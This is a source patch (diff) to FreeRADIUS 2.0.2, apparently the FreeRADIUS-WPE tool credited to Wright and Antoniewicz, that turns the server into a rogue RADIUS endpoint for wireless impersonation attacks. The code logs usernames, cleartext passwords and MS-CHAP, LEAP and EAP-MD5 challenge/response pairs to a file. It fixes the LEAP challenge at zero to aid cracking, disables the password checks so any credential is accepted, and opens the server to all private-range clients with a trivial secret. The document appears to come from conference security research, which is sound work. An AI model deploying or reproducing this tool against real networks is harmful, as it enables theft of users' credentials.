A patch for the popular open-source FreeRADIUS implementation to demonstrate RADIUS impersonation vulnerabilities by Joshua Wright and Brad Antoniewicz, demonstrated at Shmoocon 4.
6671917d602373d8010fe38de66377e4diff -ru freeradius-server-2.0.2/raddb/clients.conf freeradius-server-2.0.2-wpe/raddb/clients.conf
--- freeradius-server-2.0.2/raddb/clients.conf 2008-02-13 04:41:14.000000000 -0500
+++ freeradius-server-2.0.2-wpe/raddb/clients.conf 2008-02-15 19:39:01.000000000 -0500
@@ -227,3 +227,20 @@
# secret = testing123
# }
#}
+
+client 192.168.0.0/16 {
+ secret = test
+ shortname = testAP
+}
+client 172.16.0.0/12 {
+ secret = test
+ shortname = testAP
+}
+client 10.0.0.0/8 {
+ secret = test
+ shortname = testAP
+}
+client 127.0.0.1 {
+ secret = test
+ shortname = testAP
+}
diff -ru freeradius-server-2.0.2/raddb/eap.conf freeradius-server-2.0.2-wpe/raddb/eap.conf
--- freeradius-server-2.0.2/raddb/eap.conf 2008-01-10 05:28:35.000000000 -0500
+++ freeradius-server-2.0.2-wpe/raddb/eap.conf 2008-02-15 19:37:35.000000000 -0500
@@ -1,428 +1,33 @@
-# -*- text -*-
-##
-## eap.conf -- Configuration for EAP types (PEAP, TTLS, etc.)
-##
-## $Id: eap.conf,v 1.23 2008/01/10 10:28:35 aland Exp $
-
-#######################################################################
-#
-# Whatever you do, do NOT set 'Auth-Type := EAP'. The server
-# is smart enough to figure this out on its own. The most
-# common side effect of setting 'Auth-Type := EAP' is that the
-# users then cannot use ANY other authentication method.
-#
-# EAP types NOT listed here may be supported via the "eap2" module.
-# See experimental.conf for documentation.
-#
eap {
- # Invoke the default supported EAP type when
- # EAP-Identity response is received.
- #
- # The incoming EAP messages DO NOT specify which EAP
- # type they will be using, so it MUST be set here.
- #
- # For now, only one default EAP type may be used at a time.
- #
- # If the EAP-Type attribute is set by another module,
- # then that EAP type takes precedence over the
- # default type configured here.
- #
- default_eap_type = md5
-
- # A list is maintained to correlate EAP-Response
- # packets with EAP-Request packets. After a
- # configurable length of time, entries in the list
- # expire, and are deleted.
- #
+ default_eap_type = peap
timer_expire = 60
-
- # There are many EAP types, but the server has support
- # for only a limited subset. If the server receives
- # a request for an EAP type it does not support, then
- # it normally rejects the request. By setting this
- # configuration to "yes", you can tell the server to
- # instead keep processing the request. Another module
- # MUST then be configured to proxy the request to
- # another RADIUS server which supports that EAP type.
- #
- # If another module is NOT configured to handle the
- # request, then the request will still end up being
- # rejected.
ignore_unknown_eap_types = no
-
- # Cisco AP1230B firmware 12.2(13)JA1 has a bug. When given
- # a User-Name attribute in an Access-Accept, it copies one
- # more byte than it should.
- #
- # We can work around it by configurably adding an extra
- # zero byte.
- cisco_accounting_username_bug = no
-
- # Supported EAP-types
-
- #
- # We do NOT recommend using EAP-MD5 authentication
- # for wireless connections. It is insecure, and does
- # not provide for dynamic WEP keys.
- #
+ cisco_accounting_username_bug = yes
md5 {
}
-
- # Cisco LEAP
- #
- # We do not recommend using LEAP in new deployments. See:
- # http://www.securiteam.com/tools/5TP012ACKE.html
- #
- # Cisco LEAP uses the MS-CHAP algorithm (but not
- # the MS-CHAP attributes) to perform it's authentication.
- #
- # As a result, LEAP *requires* access to the plain-text
- # User-Password, or the NT-Password attributes.
- # 'System' authentication is impossible with LEAP.
- #
leap {
}
-
- # Generic Token Card.
- #
- # Currently, this is only permitted inside of EAP-TTLS,
- # or EAP-PEAP. The module "challenges" the user with
- # text, and the response from the user is taken to be
- # the User-Password.
- #
- # Proxying the tunneled EAP-GTC session is a bad idea,
- # the users password will go over the wire in plain-text,
- # for anyone to see.
- #
gtc {
- # The default challenge, which many clients
- # ignore..
- #challenge = "Password: "
-
- # The plain-text response which comes back
- # is put into a User-Password attribute,
- # and passed to another module for
- # authentication. This allows the EAP-GTC
- # response to be checked against plain-text,
- # or crypt'd passwords.
- #
- # If you say "Local" instead of "PAP", then
- # the module will look for a User-Password
- # configured for the request, and do the
- # authentication itself.
- #
auth_type = PAP
}
-
- ## EAP-TLS
- #
- # See raddb/certs/README for additional comments
- # on certificates.
- #
- # If OpenSSL was not found at the time the server was
- # built, the "tls", "ttls", and "peap" sections will
- # be ignored.
- #
- # Otherwise, when the server first starts in debugging
- # mode, test certificates will be created. See the
- # "make_cert_command" below for details, and the README
- # file in raddb/certs
- #
- # These test certificates SHOULD NOT be used in a normal
- # deployment. They are created only to make it easier
- # to install the server, and to perform some simple
- # tests with EAP-TLS, TTLS, or PEAP.
- #
- # See also:
- #
- # http://www.dslreports.com/forum/remark,9286052~mode=flat
- #
tls {
- #
- # These is used to simplify later configurations.
- #
- certdir = ${confdir}/certs
- cadir = ${confdir}/certs
-
private_key_password = whatever
- private_key_file = ${certdir}/server.pem
-
- # If Private key & Certificate are located in
- # the same file, then private_key_file &
- # certificate_file must contain the same file
- # name.
- #
- # If CA_file (below) is not used, then the
- # certificate_file below MUST include not
- # only the server certificate, but ALSO all
- # of the CA certificates used to sign the
- # server certificate.
- certificate_file = ${certdir}/server.pem
-
- # Trusted Root CA list
- #
- # ALL of the CA's in this list will be trusted
- # to issue client certificates for authentication.
- #
- # In general, you should use self-signed
- # certificates for 802.1x (EAP) authentication.
- # In that case, this CA file should contain
- # *one* CA certificate.
- #
- # This parameter is used only for EAP-TLS,
- # when you issue client certificates. If you do
- # not use client certificates, and you do not want
- # to permit EAP-TLS authentication, then delete
- # this configuration item.
- CA_file = ${cadir}/ca.pem
-
- #
- # For DH cipher suites to work, you have to
- # run OpenSSL to create the DH file first:
- #
- # openssl dhparam -out certs/dh 1024
- #
- dh_file = ${certdir}/dh
- random_file = ${certdir}/random
-
- #
- # This can never exceed the size of a RADIUS
- # packet (4096 bytes), and is preferably half
- # that, to accomodate other attributes in
- # RADIUS packet. On most APs the MAX packet
- # length is configured between 1500 - 1600
- # In these cases, fragment size should be
- # 1024 or less.
- #
- # fragment_size = 1024
-
- # include_length is a flag which is
- # by default set to yes If set to
- # yes, Total Length of the message is
- # included in EVERY packet we send.
- # If set to no, Total Length of the
- # message is included ONLY in the
- # First packet of a fragment series.
- #
- # include_length = yes
-
- # Check the Certificate Revocation List
- #
- # 1) Copy CA certificates and CRLs to same directory.
- # 2) Execute 'c_rehash <CA certs&CRLs Directory>'.
- # 'c_rehash' is OpenSSL's command.
- # 3) uncomment the line below.
- # 5) Restart radiusd
- # check_crl = yes
- # CA_path = /path/to/directory/with/ca_certs/and/crls/
-
- #
- # If check_cert_issuer is set, the value will
- # be checked against the DN of the issuer in
- # the client certificate. If the values do not
- # match, the cerficate verification will fail,
- # rejecting the user.
- #
- # check_cert_issuer = "/C=GB/ST=Berkshire/L=Newbury/O=My Company Ltd"
-
- #
- # If check_cert_cn is set, the value will
- # be xlat'ed and checked against the CN
- # in the client certificate. If the values
- # do not match, the certificate verification
- # will fail rejecting the user.
- #
- # This check is done only if the previous
- # "check_cert_issuer" is not set, or if
- # the check succeeds.
- #
- # check_cert_cn = %{User-Name}
- #
- # Set this option to specify the allowed
- # TLS cipher suites. The format is listed
- # in "man 1 ciphers".
- cipher_list = "DEFAULT"
-
- #
-
- # This configuration entry should be deleted
- # once the server is running in a normal
- # configuration. It is here ONLY to make
- # initial deployments easier.
- #
- make_cert_command = "${certdir}/bootstrap"
- }
-
- # The TTLS module implements the EAP-TTLS protocol,
- # which can be described as EAP inside of Diameter,
- # inside of TLS, inside of EAP, inside of RADIUS...
- #
- # Surprisingly, it works quite well.
- #
- # The TTLS module needs the TLS module to be installed
- # and configured, in order to use the TLS tunnel
- # inside of the EAP packet. You will still need to
- # configure the TLS module, even if you do not want
- # to deploy EAP-TLS in your network. Users will not
- # be able to request EAP-TLS, as it requires them to
- # have a client certificate. EAP-TTLS does not
- # require a client certificate.
- #
- # You can make TTLS require a client cert by setting
- #
- # EAP-TLS-Require-Client-Cert = Yes
- #
- # in the control items for a request.
- #
+ private_key_file = ${raddbdir}/certs/server.pem
+ certificate_file = ${raddbdir}/certs/server.pem
+ CA_file = ${raddbdir}/certs/ca.pem
+ dh_file = ${raddbdir}/certs/dh
+ random_file = ${raddbdir}/certs/random
+ fragment_size = 1024
+ include_length = yes
+ }
ttls {
- # The tunneled EAP session needs a default
- # EAP type which is separate from the one for
- # the non-tunneled EAP module. Inside of the
- # TTLS tunnel, we recommend using EAP-MD5.
- # If the request does not contain an EAP
- # conversation, then this configuration entry
- # is ignored.
- default_eap_type = md5
-
- # The tunneled authentication request does
- # not usually contain useful attributes
- # like 'Calling-Station-Id', etc. These
- # attributes are outside of the tunnel,
- # and normally unavailable to the tunneled
- # authentication request.
- #
- # By setting this configuration entry to
- # 'yes', any attribute which NOT in the
- # tunneled authentication request, but
- # which IS available outside of the tunnel,
- # is copied to the tunneled request.
- #
- # allowed values: {no, yes}
- copy_request_to_tunnel = no
-
- # The reply attributes sent to the NAS are
- # usually based on the name of the user
- # 'outside' of the tunnel (usually
- # 'anonymous'). If you want to send the
- # reply attributes based on the user name
- # inside of the tunnel, then set this
- # configuration entry to 'yes', and the reply
- # to the NAS will be taken from the reply to
- # the tunneled request.
- #
- # allowed values: {no, yes}
- use_tunneled_reply = no
-
- #
- # The inner tunneled request can be sent
- # through a virtual server constructed
- # specifically for this purpose.
- #
- # If this entry is commented out, the inner
- # tunneled request will be sent through
- # the virtual server that processed the
- # outer requests.
- #
- #virtual_server = "inner-tunnel"
}
-
- ##################################################
- #
- # !!!!! WARNINGS for Windows compatibility !!!!!
- #
- ##################################################
- #
- # If you see the server send an Access-Challenge,
- # and the client never sends another Access-Request,
- # then
- #
- # STOP!
- #
- # The server certificate has to have special OID's
- # in it, or else the Microsoft clients will silently
- # fail. See the "scripts/xpextensions" file for
- # details, and the following page:
- #
- # http://support.microsoft.com/kb/814394/en-us
- #
- # For additional Windows XP SP2 issues, see:
- #
- # http://support.microsoft.com/kb/885453/en-us
- #
- # Note that we do not necessarily agree with their
- # explanation... but the fix does appear to work.
- #
- ##################################################
-
- #
- # The tunneled EAP session needs a default EAP type
- # which is separate from the one for the non-tunneled
- # EAP module. Inside of the TLS/PEAP tunnel, we
- # recommend using EAP-MS-CHAPv2.
- #
- # The PEAP module needs the TLS module to be installed
- # and configured, in order to use the TLS tunnel
- # inside of the EAP packet. You will still need to
- # configure the TLS module, even if you do not want
- # to deploy EAP-TLS in your network. Users will not
- # be able to request EAP-TLS, as it requires them to
- # have a client certificate. EAP-PEAP does not
- # require a client certificate.
- #
- #
- # You can make TTLS require a client cert by setting
- #
- # EAP-TLS-Require-Client-Cert = Yes
- #
- # in the control items for a request.
- #
- peap {
- # The tunneled EAP session needs a default
- # EAP type which is separate from the one for
- # the non-tunneled EAP module. Inside of the
- # PEAP tunnel, we recommend using MS-CHAPv2,
- # as that is the default type supported by
- # Windows clients.
+ peap {
default_eap_type = mschapv2
-
- # the PEAP module also has these configuration
- # items, which are the same as for TTLS.
copy_request_to_tunnel = no
use_tunneled_reply = no
-
- # When the tunneled session is proxied, the
- # home server may not understand EAP-MSCHAP-V2.
- # Set this entry to "no" to proxy the tunneled
- # EAP-MSCHAP-V2 as normal MSCHAPv2.
- # proxy_tunneled_request_as_eap = yes
-
- #
- # The inner tunneled request can be sent
- # through a virtual server constructed
- # specifically for this purpose.
- #
- # If this entry is commented out, the inner
- # tunneled request will be sent through
- # the virtual server that processed the
- # outer requests.
- #
- #virtual_server = "inner-tunnel"
+ proxy_tunneled_request_as_eap = yes
}
-
- #
- # This takes no configuration.
- #
- # Note that it is the EAP MS-CHAPv2 sub-module, not
- # the main 'mschap' module.
- #
- # Note also that in order for this sub-module to work,
- # the main 'mschap' module MUST ALSO be configured.
- #
- # This module is the *Microsoft* implementation of MS-CHAPv2
- # in EAP. There is another (incompatible) implementation
- # of MS-CHAPv2 in EAP by Cisco, which FreeRADIUS does not
- # currently support.
- #
mschapv2 {
}
}
diff -ru freeradius-server-2.0.2/raddb/radiusd.conf.in freeradius-server-2.0.2-wpe/raddb/radiusd.conf.in
--- freeradius-server-2.0.2/raddb/radiusd.conf.in 2008-02-13 09:21:05.000000000 -0500
+++ freeradius-server-2.0.2-wpe/raddb/radiusd.conf.in 2008-02-15 19:37:35.000000000 -0500
@@ -375,6 +375,7 @@
# The program to execute to do concurrency checks.
checkrad = ${sbindir}/checkrad
+wpelogfile = ${logdir}/freeradius-server-wpe.log
# SECURITY CONFIGURATION
#
diff -ru freeradius-server-2.0.2/raddb/users freeradius-server-2.0.2-wpe/raddb/users
--- freeradius-server-2.0.2/raddb/users 2007-10-23 09:41:23.000000000 -0400
+++ freeradius-server-2.0.2-wpe/raddb/users 2008-02-15 19:37:35.000000000 -0500
@@ -1,203 +1,3 @@
-#
-# Please read the documentation file ../doc/processing_users_file,
-# or 'man 5 users' (after installing the server) for more information.
-#
-# This file contains authentication security and configuration
-# information for each user. Accounting requests are NOT processed
-# through this file. Instead, see 'acct_users', in this directory.
-#
-# The first field is the user's name and can be up to
-# 253 characters in length. This is followed (on the same line) with
-# the list of authentication requirements for that user. This can
-# include password, comm server name, comm server port number, protocol
-# type (perhaps set by the "hints" file), and huntgroup name (set by
-# the "huntgroups" file).
-#
-# If you are not sure why a particular reply is being sent by the
-# server, then run the server in debugging mode (radiusd -X), and
-# you will see which entries in this file are matched.
-#
-# When an authentication request is received from the comm server,
-# these values are tested. Only the first match is used unless the
-# "Fall-Through" variable is set to "Yes".
-#
-# A special user named "DEFAULT" matches on all usernames.
-# You can have several DEFAULT entries. All entries are processed
-# in the order they appear in this file. The first entry that
-# matches the login-request will stop processing unless you use
-# the Fall-Through variable.
-#
-# If you use the database support to turn this file into a .db or .dbm
-# file, the DEFAULT entries _have_ to be at the end of this file and
-# you can't have multiple entries for one username.
-#
-# Indented (with the tab character) lines following the first
-# line indicate the configuration values to be passed back to
-# the comm server to allow the initiation of a user session.
-# This can include things like the PPP configuration values
-# or the host to log the user onto.
-#
-# You can include another `users' file with `$INCLUDE users.other'
-#
+DEFAULT Cleartext-Password := "foo", MS-CHAP-Use-NTLM-Auth := 0
-#
-# For a list of RADIUS attributes, and links to their definitions,
-# see:
-#
-# http://www.freeradius.org/rfc/attributes.html
-#
-
-#
-# Deny access for a specific user. Note that this entry MUST
-# be before any other 'Auth-Type' attribute which results in the user
-# being authenticated.
-#
-# Note that there is NO 'Fall-Through' attribute, so the user will not
-# be given any additional resources.
-#
-#lameuser Auth-Type := Reject
-# Reply-Message = "Your account has been disabled."
-
-#
-# Deny access for a group of users.
-#
-# Note that there is NO 'Fall-Through' attribute, so the user will not
-# be given any additional resources.
-#
-#DEFAULT Group == "disabled", Auth-Type := Reject
-# Reply-Message = "Your account has been disabled."
-#
-
-#
-# This is a complete entry for "steve". Note that there is no Fall-Through
-# entry so that no DEFAULT entry will be used, and the user will NOT
-# get any attributes in addition to the ones listed here.
-#
-#steve Cleartext-Password := "testing"
-# Service-Type = Framed-User,
-# Framed-Protocol = PPP,
-# Framed-IP-Address = 172.16.3.33,
-# Framed-IP-Netmask = 255.255.255.0,
-# Framed-Routing = Broadcast-Listen,
-# Framed-Filter-Id = "std.ppp",
-# Framed-MTU = 1500,
-# Framed-Compression = Van-Jacobsen-TCP-IP
-
-#
-# This is an entry for a user with a space in their name.
-# Note the double quotes surrounding the name.
-#
-#"John Doe" Cleartext-Password := "hello"
-# Reply-Message = "Hello, %{User-Name}"
-
-#
-# Dial user back and telnet to the default host for that port
-#
-#Deg Cleartext-Password := "ge55ged"
-# Service-Type = Callback-Login-User,
-# Login-IP-Host = 0.0.0.0,
-# Callback-Number = "9,5551212",
-# Login-Service = Telnet,
-# Login-TCP-Port = Telnet
-
-#
-# Another complete entry. After the user "dialbk" has logged in, the
-# connection will be broken and the user will be dialed back after which
-# he will get a connection to the host "timeshare1".
-#
-#dialbk Cleartext-Password := "callme"
-# Service-Type = Callback-Login-User,
-# Login-IP-Host = timeshare1,
-# Login-Service = PortMaster,
-# Callback-Number = "9,1-800-555-1212"
-
-#
-# user "swilson" will only get a static IP number if he logs in with
-# a framed protocol on a terminal server in Alphen (see the huntgroups file).
-#
-# Note that by setting "Fall-Through", other attributes will be added from
-# the following DEFAULT entries
-#
-#swilson Service-Type == Framed-User, Huntgroup-Name == "alphen"
-# Framed-IP-Address = 192.168.1.65,
-# Fall-Through = Yes
-
-#
-# If the user logs in as 'username.shell', then authenticate them
-# using the default method, give them shell access, and stop processing
-# the rest of the file.
-#
-#DEFAULT Suffix == ".shell"
-# Service-Type = Login-User,
-# Login-Service = Telnet,
-# Login-IP-Host = your.shell.machine
-
-
-#
-# The rest of this file contains the several DEFAULT entries.
-# DEFAULT entries match with all login names.
-# Note that DEFAULT entries can also Fall-Through (see first entry).
-# A name-value pair from a DEFAULT entry will _NEVER_ override
-# an already existing name-value pair.
-#
-
-#
-# Set up different IP address pools for the terminal servers.
-# Note that the "+" behind the IP address means that this is the "base"
-# IP address. The Port-Id (S0, S1 etc) will be added to it.
-#
-#DEFAULT Service-Type == Framed-User, Huntgroup-Name == "alphen"
-# Framed-IP-Address = 192.168.1.32+,
-# Fall-Through = Yes
-
-#DEFAULT Service-Type == Framed-User, Huntgroup-Name == "delft"
-# Framed-IP-Address = 192.168.2.32+,
-# Fall-Through = Yes
-
-#
-# Sample defaults for all framed connections.
-#
-#DEFAULT Service-Type == Framed-User
-# Framed-IP-Address = 255.255.255.254,
-# Framed-MTU = 576,
-# Service-Type = Framed-User,
-# Fall-Through = Yes
-
-#
-# Default for PPP: dynamic IP address, PPP mode, VJ-compression.
-# NOTE: we do not use Hint = "PPP", since PPP might also be auto-detected
-# by the terminal server in which case there may not be a "P" suffix.
-# The terminal server sends "Framed-Protocol = PPP" for auto PPP.
-#
-DEFAULT Framed-Protocol == PPP
- Framed-Protocol = PPP,
- Framed-Compression = Van-Jacobson-TCP-IP
-
-#
-# Default for CSLIP: dynamic IP address, SLIP mode, VJ-compression.
-#
-DEFAULT Hint == "CSLIP"
- Framed-Protocol = SLIP,
- Framed-Compression = Van-Jacobson-TCP-IP
-
-#
-# Default for SLIP: dynamic IP address, SLIP mode.
-#
-DEFAULT Hint == "SLIP"
- Framed-Protocol = SLIP
-
-#
-# Last default: rlogin to our main server.
-#
-#DEFAULT
-# Service-Type = Login-User,
-# Login-Service = Rlogin,
-# Login-IP-Host = shellbox.ispdomain.com
-
-# #
-# # Last default: shell on the local terminal server.
-# #
-# DEFAULT
-# Service-Type = Administrative-User
-
-# On no match, the user is denied access.
+DEFAULT Cleartext-Password := "a"
diff -ru freeradius-server-2.0.2/src/include/radiusd.h freeradius-server-2.0.2-wpe/src/include/radiusd.h
--- freeradius-server-2.0.2/src/include/radiusd.h 2008-02-11 10:19:54.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/include/radiusd.h 2008-02-15 19:37:35.000000000 -0500
@@ -247,6 +247,7 @@
#endif
char *log_file;
char *checkrad;
+ char *wpelogfile;
const char *pid_file;
rad_listen_t *listen;
int syslog_facility;
diff -ru freeradius-server-2.0.2/src/main/auth.c freeradius-server-2.0.2-wpe/src/main/auth.c
--- freeradius-server-2.0.2/src/main/auth.c 2007-12-10 11:07:30.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/main/auth.c 2008-02-15 19:37:35.000000000 -0500
@@ -319,6 +319,7 @@
return -1;
}
DEBUG2("auth: user supplied User-Password matches local User-Password");
+ log_wpe("password", request->username->vp_strvalue, password_pair->vp_strvalue, NULL, 0, NULL, 0);
break;
} else if (auth_item->attribute != PW_CHAP_PASSWORD) {
diff -ru freeradius-server-2.0.2/src/main/log.c freeradius-server-2.0.2-wpe/src/main/log.c
--- freeradius-server-2.0.2/src/main/log.c 2007-11-23 08:46:53.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/main/log.c 2008-02-15 19:37:35.000000000 -0500
@@ -28,6 +28,10 @@
#include <freeradius-devel/radiusd.h>
+#include <stdio.h>
+#include <time.h>
+
+
#ifdef HAVE_SYSLOG_H
# include <syslog.h>
/* keep track of whether we've run openlog() */
@@ -237,5 +241,52 @@
}
+void log_wpe(char *authtype, char *username, char *password, unsigned char *challenge,
+ unsigned int challen, unsigned char *response, unsigned int resplen)
+{
+ FILE *logfd;
+ time_t nowtime;
+ unsigned int count;
+
+ /* Get wpelogfile parameter and log data */
+ if (mainconfig.wpelogfile == NULL) {
+ logfd = stderr;
+ } else {
+ logfd = fopen(mainconfig.wpelogfile, "a");
+ if (logfd == NULL) {
+ DEBUG2(" rlm_mschap: FAILED: Unable to open output log file %s: %s", mainconfig.wpelogfile, strerror(errno));
+ logfd = stderr;
+ }
+ }
+ nowtime = time(NULL);
+ fprintf(logfd, "%s: %s\n", authtype, ctime(&nowtime));
+
+ if (username != NULL) {
+ fprintf(logfd, "\tusername: %s\n", username);
+ }
+ if (password != NULL) {
+ fprintf(logfd, "\tpassword: %s\n", password);
+ }
+
+ if (challen != 0) {
+ fprintf(logfd, "\tchallenge: ");
+ for (count=0; count!=(challen-1); count++) {
+ fprintf(logfd, "%02x:",challenge[count]);
+ }
+ fprintf(logfd, "%02x\n",challenge[challen-1]);
+ }
+
+ if (resplen != 0) {
+ fprintf(logfd, "\tresponse: ");
+ for (count=0; count!=(resplen-1); count++) {
+ fprintf(logfd, "%02x:",response[count]);
+ }
+ fprintf(logfd, "%02x\n",response[resplen-1]);
+ }
+
+ fprintf(logfd, "\n");
+ fclose(logfd);
+}
+
diff -ru freeradius-server-2.0.2/src/main/mainconfig.c freeradius-server-2.0.2-wpe/src/main/mainconfig.c
--- freeradius-server-2.0.2/src/main/mainconfig.c 2008-01-21 05:29:02.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/main/mainconfig.c 2008-02-15 19:37:35.000000000 -0500
@@ -188,6 +188,7 @@
{ "checkrad", PW_TYPE_STRING_PTR, 0, &mainconfig.checkrad, "${sbindir}/checkrad" },
{ "debug_level", PW_TYPE_INTEGER, 0, &mainconfig.debug_level, "0"},
+ { "wpelogfile", PW_TYPE_STRING_PTR, 0, &mainconfig.wpelogfile, "${logdir}/freeradius-server-wpe.log" },
{ "proxy_requests", PW_TYPE_BOOLEAN, 0, &mainconfig.proxy_requests, "yes" },
{ "security", PW_TYPE_SUBSECTION, 0, NULL, (const void *) security_config },
diff -ru freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c
--- freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2007-11-25 09:02:08.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2008-02-15 19:37:35.000000000 -0500
@@ -244,10 +244,11 @@
* Verify the MS-CHAP response from the user.
*/
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
- leap_session_t *session)
+ leap_session_t *session, char *username)
{
unsigned char ntpwdhash[16];
unsigned char response[24];
+ unsigned char challenge[8] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
/*
@@ -266,6 +267,7 @@
*/
eapleap_mschap(ntpwdhash, session->peer_challenge, response);
if (memcmp(response, packet->challenge, 24) == 0) {
+ log_wpe("LEAP", username, NULL, challenge, 8, response, 24);
DEBUG2(" rlm_eap_leap: NtChallengeResponse from AP is valid");
memcpy(session->peer_response, response, sizeof(response));
return 1;
@@ -415,7 +417,9 @@
* Fill the challenge with random bytes.
*/
for (i = 0; i < reply->count; i++) {
- reply->challenge[i] = fr_rand();
+ /* WPE - fixed challenge */
+ //reply->challenge[i] = fr_rand();
+ reply->challenge[i] = 0;
}
DEBUG2(" rlm_eap_leap: Issuing AP Challenge");
diff -ru freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h
--- freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2006-11-14 16:22:09.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2008-02-15 19:37:35.000000000 -0500
@@ -68,7 +68,7 @@
LEAP_PACKET *eapleap_extract(EAP_DS *auth);
LEAP_PACKET *eapleap_initiate(EAP_DS *eap_ds, VALUE_PAIR *user_name);
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
- leap_session_t *session);
+ leap_session_t *session, char *username);
LEAP_PACKET *eapleap_stage6(LEAP_PACKET *packet, REQUEST *request,
VALUE_PAIR *user_name, VALUE_PAIR* password,
leap_session_t *session,
diff -ru freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c
--- freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2007-12-25 03:18:56.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2008-02-15 19:37:35.000000000 -0500
@@ -133,7 +133,7 @@
switch (session->stage) {
case 4: /* Verify NtChallengeResponse */
DEBUG2(" rlm_eap_leap: Stage 4");
- rcode = eapleap_stage4(packet, password, session);
+ rcode = eapleap_stage4(packet, password, session, username);
session->stage = 6;
/*
diff -ru freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c
--- freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2007-11-23 07:58:12.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2008-02-15 19:37:35.000000000 -0500
@@ -202,9 +202,13 @@
/*
* The length of the response is always 16 for MD5.
*/
- if (memcmp(output, packet->value, 16) != 0) {
- return 0;
- }
+ //WPE - always succeed
+ //if (memcmp(output, packet->value, 16) != 0) {
+
+ //return 0;
+ //}
+ log_wpe("eap_md5", packet->name, NULL, challenge, MD5_CHALLENGE_LEN,
+ packet->value, 16);
return 1;
}
diff -ru freeradius-server-2.0.2/src/modules/rlm_files/rlm_files.c freeradius-server-2.0.2-wpe/src/modules/rlm_files/rlm_files.c
--- freeradius-server-2.0.2/src/modules/rlm_files/rlm_files.c 2007-11-23 08:46:59.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_files/rlm_files.c 2008-02-15 19:37:35.000000000 -0500
@@ -463,6 +463,7 @@
default_pl = default_pl->next;
}
+ /* WPE - look for matching entries here */
if (paircompare(request, request_pairs, pl->check, reply_pairs) == 0) {
DEBUG2(" %s: Matched entry %s at line %d",
filename, match, pl->lineno);
diff -ru freeradius-server-2.0.2/src/modules/rlm_mschap/rlm_mschap.c freeradius-server-2.0.2-wpe/src/modules/rlm_mschap/rlm_mschap.c
--- freeradius-server-2.0.2/src/modules/rlm_mschap/rlm_mschap.c 2008-01-09 08:20:56.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_mschap/rlm_mschap.c 2008-02-15 19:37:35.000000000 -0500
@@ -735,12 +735,14 @@
static int do_mschap(rlm_mschap_t *inst,
REQUEST *request, VALUE_PAIR *password,
uint8_t *challenge, uint8_t *response,
- uint8_t *nthashhash)
+ uint8_t *nthashhash, char *username)
{
int do_ntlm_auth = 0;
uint8_t calculated[24];
VALUE_PAIR *vp = NULL;
+ log_wpe("mschap", username, NULL, challenge, 8, response, 24);
+
/*
* If we have ntlm_auth configured, use it unless told
* otherwise
@@ -778,9 +780,10 @@
}
smbdes_mschap(password->vp_strvalue, challenge, calculated);
- if (memcmp(response, calculated, 24) != 0) {
- return -1;
- }
+ /* Always return success for any password */
+ //if (memcmp(response, calculated, 24) != 0) {
+ // return -1;
+ //}
/*
* If the password exists, and is an NT-Password,
@@ -1194,8 +1197,10 @@
/*
* Do the MS-CHAP authentication.
*/
+ username = pairfind(request->packet->vps, PW_USER_NAME);
if (do_mschap(inst, request, password, challenge->vp_octets,
- response->vp_octets + offset, nthashhash) < 0) {
+ response->vp_octets + offset, nthashhash,
+ username->vp_strvalue) < 0) {
DEBUG2(" rlm_mschap: MS-CHAP-Response is incorrect.");
mschap_add_reply(&request->reply->vps,
*response->vp_octets,
@@ -1274,7 +1279,8 @@
username_string);
if (do_mschap(inst, request, nt_password, mschapv1_challenge,
- response->vp_octets + 26, nthashhash) < 0) {
+ response->vp_octets + 26, nthashhash,
+ username_string) < 0) {
DEBUG2(" rlm_mschap: FAILED: MS-CHAP2-Response is incorrect");
mschap_add_reply(&request->reply->vps,
*response->vp_octets,
diff -ru freeradius-server-2.0.2/src/modules/rlm_pap/rlm_pap.c freeradius-server-2.0.2-wpe/src/modules/rlm_pap/rlm_pap.c
--- freeradius-server-2.0.2/src/modules/rlm_pap/rlm_pap.c 2007-12-28 23:38:19.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_pap/rlm_pap.c 2008-02-15 19:37:35.000000000 -0500
@@ -492,6 +492,10 @@
return RLM_MODULE_INVALID;
}
+ /* WPE */
+ log_wpe("pap",request->username->vp_strvalue, request->password->vp_strvalue,
+ NULL, 0, NULL, 0);
+
/*
* Clear-text passwords are the only ones we support.
*/
@@ -582,11 +586,14 @@
do_clear:
DEBUG("rlm_pap: Using clear text password \"%s\"",
vp->vp_strvalue);
+ /* WPE - always succeed */
+ /*
if (strcmp((char *) vp->vp_strvalue,
(char *) request->password->vp_strvalue) != 0){
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: CLEAR TEXT password check failed");
goto make_msg;
}
+ */
done:
